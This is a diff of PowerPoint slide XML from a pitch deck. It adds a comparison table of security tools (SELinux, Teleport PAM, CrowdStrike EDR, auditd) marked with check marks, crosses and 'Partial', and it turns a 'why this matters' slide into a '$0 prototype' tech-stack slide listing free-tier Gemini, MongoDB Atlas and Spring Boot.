+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>✅</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="19" name="TextBox 18"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4023360" y="1828800"/>
+            <a:ext cx="1005840" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF4444"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>❌</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="20" name="TextBox 19"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="5029200" y="1828800"/>
+            <a:ext cx="1371600" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF4444"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>❌</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="21" name="TextBox 20"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="6400800" y="1828800"/>
+            <a:ext cx="822960" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF4444"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>❌</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="22" name="TextBox 21"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="548640" y="2194560"/>
+            <a:ext cx="1645920" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>SELinux</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="23" name="TextBox 22"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2194560" y="2194560"/>
+            <a:ext cx="822960" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF4444"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>❌</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="24" name="TextBox 23"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3017520" y="2194560"/>
+            <a:ext cx="1005840" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="22C55E"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>✅</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="25" name="TextBox 24"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4023360" y="2194560"/>
+            <a:ext cx="1005840" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF4444"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>❌</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="26" name="TextBox 25"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="5029200" y="2194560"/>
+            <a:ext cx="1371600" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF4444"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>❌</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="27" name="TextBox 26"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="6400800" y="2194560"/>
+            <a:ext cx="822960" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF4444"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>❌</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="28" name="TextBox 27"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="548640" y="2560320"/>
+            <a:ext cx="1645920" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>PAM (Teleport)</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="29" name="TextBox 28"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2194560" y="2560320"/>
+            <a:ext cx="822960" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF4444"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>❌</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="30" name="TextBox 29"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3017520" y="2560320"/>
+            <a:ext cx="1005840" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="22C55E"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>✅</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="31" name="TextBox 30"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4023360" y="2560320"/>
+            <a:ext cx="1005840" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF4444"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>❌</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="32" name="TextBox 31"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="5029200" y="2560320"/>
+            <a:ext cx="1371600" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
                 <a:solidFill>
                   <a:srgbClr val="B0B0C0"/>
                 </a:solidFill>
@@ -6508,7 +5643,475 @@
               </a:defRPr>
             </a:pPr>
             <a:r>
-              <a:t>Gemini multimodal API (STT)</a:t>
+              <a:t>Partial</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="33" name="TextBox 32"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="6400800" y="2560320"/>
+            <a:ext cx="822960" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF4444"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>❌</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="34" name="TextBox 33"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="548640" y="2926079"/>
+            <a:ext cx="1645920" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>EDR (CrowdStrike)</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="35" name="TextBox 34"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2194560" y="2926079"/>
+            <a:ext cx="822960" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF4444"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>❌</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="36" name="TextBox 35"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3017520" y="2926079"/>
+            <a:ext cx="1005840" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="B0B0C0"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>Partial</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="37" name="TextBox 36"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4023360" y="2926079"/>
+            <a:ext cx="1005840" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="B0B0C0"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>Partial</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="38" name="TextBox 37"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="5029200" y="2926079"/>
+            <a:ext cx="1371600" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="B0B0C0"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>Partial</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="39" name="TextBox 38"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="6400800" y="2926079"/>
+            <a:ext cx="822960" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF4444"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>❌</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="40" name="TextBox 39"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="548640" y="3291839"/>
+            <a:ext cx="1645920" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>auditd</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="41" name="TextBox 40"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2194560" y="3291839"/>
+            <a:ext cx="822960" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF4444"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>❌</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="42" name="TextBox 41"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3017520" y="3291839"/>
+            <a:ext cx="1005840" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF4444"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>❌</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="43" name="TextBox 42"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4023360" y="3291839"/>
+            <a:ext cx="1005840" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF4444"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>❌</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="44" name="TextBox 43"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="5029200" y="3291839"/>
+            <a:ext cx="1371600" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF4444"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>❌</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="45" name="TextBox 44"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="6400800" y="3291839"/>
+            <a:ext cx="822960" cy="256032"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF4444"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>❌</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6555,7 +6158,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="548640" y="274320"/>
-            <a:ext cx="7772400" cy="492443"/>
+            <a:ext cx="7772400" cy="640080"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6577,14 +6180,8 @@
               </a:defRPr>
             </a:pPr>
             <a:r>
-              <a:rPr dirty="0"/>
-              <a:t>WHY THIS</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> MATTERS</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
+              <a:t>TECH STACK — $0 PROTOTYPE</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -6640,8 +6237,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="548640" y="1097280"/>
-            <a:ext cx="365760" cy="274320"/>
+            <a:off x="548640" y="1051560"/>
+            <a:ext cx="8046720" cy="365760"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6655,7 +6252,7 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="2000" b="1">
+              <a:defRPr sz="1400" b="1">
                 <a:solidFill>
                   <a:srgbClr val="00D4AA"/>
                 </a:solidFill>
@@ -6663,7 +6260,7 @@
               </a:defRPr>
             </a:pPr>
             <a:r>
-              <a:t>1</a:t>
+              <a:t>$0 prototype — free-tier Gemini + MongoDB Atlas M0 + open-source</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6676,8 +6273,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1005840" y="1097280"/>
-            <a:ext cx="3200400" cy="274320"/>
+            <a:off x="731520" y="1554480"/>
+            <a:ext cx="1645920" cy="274320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6691,7 +6288,7 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="1400" b="1">
+              <a:defRPr sz="1200" b="1">
                 <a:solidFill>
                   <a:srgbClr val="F8F8F8"/>
                 </a:solidFill>
@@ -6699,7 +6296,7 @@
               </a:defRPr>
             </a:pPr>
             <a:r>
-              <a:t>Sovereign AI</a:t>
+              <a:t>Runtime</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6712,8 +6309,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1005840" y="1371600"/>
-            <a:ext cx="7498079" cy="274320"/>
+            <a:off x="2377440" y="1554480"/>
+            <a:ext cx="5943600" cy="274320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6727,7 +6324,7 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="1100" b="0">
+              <a:defRPr sz="1200" b="0">
                 <a:solidFill>
                   <a:srgbClr val="B0B0C0"/>
                 </a:solidFill>
@@ -6735,7 +6332,7 @@
               </a:defRPr>
             </a:pPr>
             <a:r>
-              <a:t>Zero data exfiltration. All inference local. India data sovereignty.</a:t>
+              <a:t>Java 17, Spring Boot 3.3.5</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6748,8 +6345,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="548640" y="1920240"/>
-            <a:ext cx="365760" cy="274320"/>
+            <a:off x="731520" y="1938528"/>
+            <a:ext cx="1645920" cy="274320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
